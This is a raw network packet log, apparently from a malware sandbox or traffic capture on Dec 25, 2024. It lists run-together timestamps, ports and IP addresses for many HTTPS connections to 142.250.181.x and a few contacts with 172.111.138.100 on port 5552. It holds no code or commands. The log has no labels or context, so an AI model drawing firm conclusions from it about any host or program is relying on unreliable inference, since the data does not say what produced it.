                                                                                                                                                                Dec 25, 2024 09:07:26.108848095 CET44349741142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.108910084 CET49741443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.109002113 CET49741443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.109045029 CET44349741142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.109131098 CET49741443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.109433889 CET49749443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.109462976 CET44349749142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.109524965 CET49749443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.109994888 CET49749443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:26.110012054 CET44349749142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.240168095 CET49750443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.240205050 CET44349750142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.240334034 CET49750443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.240567923 CET49751443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.240617990 CET44349751142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.240664005 CET49751443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.240955114 CET49751443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.240973949 CET44349751142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.241456032 CET49750443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:26.241467953 CET44349750142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:26.989634037 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:07:27.220963001 CET49748443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.220989943 CET49749443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.220993996 CET49751443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:27.221455097 CET49750443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:27.246078014 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:27.246222973 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:07:27.246475935 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:07:27.267246962 CET49754443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.267282009 CET44349754142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:27.267493963 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.267541885 CET44349755142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:27.267586946 CET49754443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.267819881 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.269005060 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.269017935 CET44349755142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:27.269098043 CET49754443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:27.269112110 CET44349754142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:27.366748095 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:28.962115049 CET44349755142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:28.962269068 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:28.962848902 CET44349755142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:28.962896109 CET44349754142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:28.962949038 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:28.963099003 CET49754443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:28.964065075 CET44349754142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:28.964190006 CET49754443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:28.973455906 CET49755443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:28.973473072 CET44349755142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.540654898 CET49774443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.540672064 CET44349774142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.541212082 CET49779443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.541260004 CET44349779142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.541368008 CET49779443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.542738914 CET49779443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.542762995 CET44349779142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.549455881 CET44349772142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.549515963 CET49772443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.549524069 CET44349772142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.549603939 CET49772443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.553750992 CET44349772142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.553786039 CET44349772142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.553805113 CET49772443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.553829908 CET49772443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.554019928 CET49772443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.554027081 CET44349772142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.554663897 CET49780443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.554779053 CET44349780142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.554923058 CET49780443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.555078983 CET49780443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:36.555114031 CET44349780142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574424028 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574481010 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574485064 CET49771443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.574506044 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574549913 CET49771443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.574558020 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574601889 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.574647903 CET49771443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.578841925 CET49771443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.578850985 CET44349771142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.579504967 CET49781443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.579575062 CET44349781142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.579651117 CET49781443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.579816103 CET49781443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.579847097 CET44349781142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811563969 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811693907 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811781883 CET49773443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.811821938 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811871052 CET49773443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.811877966 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811934948 CET49773443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.811939955 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.811976910 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.812024117 CET49773443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.818116903 CET49773443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.818136930 CET44349773142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.818581104 CET49782443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.818608046 CET44349782142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:36.818662882 CET49782443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.818859100 CET49782443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:36.818871021 CET44349782142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:37.052938938 CET49779443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.052989006 CET49780443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.053006887 CET49781443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:37.053014994 CET49782443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:37.054589987 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.054635048 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:37.054704905 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.056077957 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.056118965 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:37.056169033 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.056752920 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.056762934 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:37.062298059 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:37.062309980 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.762861967 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.762957096 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.763511896 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.763588905 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.763619900 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.763808966 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.764153957 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.764875889 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.767261982 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.767271042 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.767607927 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.767730951 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.768874884 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.770351887 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.770356894 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.770565033 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.770930052 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.770930052 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:38.811328888 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:38.811351061 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.666691065 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.666759968 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.667768002 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.667824984 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.667840004 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.667911053 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.668544054 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.668591976 CET44349784142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.668642044 CET49784443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.669081926 CET49787443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.669117928 CET44349787142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.669225931 CET49788443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.669234037 CET49787443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.669261932 CET44349788142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.669318914 CET49788443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.669734955 CET49787443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.669749975 CET44349787142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.669959068 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.669995070 CET44349783142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.670090914 CET49783443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.670855045 CET49789443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.670886040 CET44349789142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.670943022 CET49789443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.671211958 CET49790443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.671220064 CET44349790142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.671267986 CET49790443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.671654940 CET49789443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:39.671669006 CET44349789142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.671701908 CET49790443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.671716928 CET44349790142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:39.672260046 CET49788443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:39.672271967 CET44349788142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:41.362323999 CET44349788142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:41.362405062 CET49788443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:45.379456997 CET44349808142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:46.782417059 CET49805443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.782466888 CET49806443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:46.782481909 CET49807443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:46.782519102 CET49808443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.783112049 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.783143997 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:46.783220053 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.784574032 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.784594059 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:46.787766933 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.787791014 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:46.787870884 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.788270950 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:46.788285017 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.477720022 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.477804899 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.478794098 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.478857040 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.482754946 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.482772112 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.483097076 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.483201981 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.483648062 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.489819050 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.489907980 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.492232084 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.492306948 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.495681047 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.495691061 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.496100903 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.496247053 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.496646881 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:48.527357101 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:48.539355993 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.392278910 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.392535925 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.392551899 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.392570019 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.392615080 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.395051003 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.395104885 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.397300959 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.397344112 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.397394896 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.398096085 CET49811443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.398106098 CET44349811142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.398737907 CET49814443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.398758888 CET44349814142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.398839951 CET49814443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399024963 CET49814443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399039030 CET44349814142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.399168968 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399188042 CET44349810142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.399197102 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399230003 CET49810443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399638891 CET49815443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399686098 CET44349815142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.399766922 CET49815443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399961948 CET49815443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:49.399977922 CET44349815142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.424179077 CET49816443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.424204111 CET44349816142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.424367905 CET49816443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.424518108 CET49817443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.424534082 CET44349817142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.424616098 CET49817443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.431448936 CET49816443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.431462049 CET44349816142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:49.431824923 CET49817443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:49.431837082 CET44349817142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.782490015 CET49814443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.782574892 CET49815443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.782653093 CET49816443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:50.782653093 CET49817443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:50.782955885 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783056021 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.783154011 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783837080 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.783890009 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.784800053 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.784864902 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:50.784976959 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.785351992 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:50.785378933 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.474634886 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.474724054 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.475322008 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.475394011 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.477771997 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.477858067 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.478842974 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.478904963 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496114969 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496192932 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.496412992 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.496475935 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.496830940 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.499983072 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.500044107 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.500359058 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.500658989 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.501341105 CET49822443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:52.543343067 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:52.547336102 CET44349822142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.384733915 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.384922981 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.384994984 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385066032 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385267973 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385318041 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385433912 CET44349821142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.385536909 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385576010 CET49821443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.385745049 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.385780096 CET44349825142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.386399031 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386434078 CET44349826142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:07:53.386495113 CET49825443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:07:53.386647940 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386959076 CET49826443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:07:53.386970997 CET44349826142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412605047 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.412662983 CET44349864142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.412770033 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.412985086 CET49861443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:01.412993908 CET44349861142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:01.413708925 CET49864443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:01.413738966 CET44349864142.250.181.14192.168.2.4
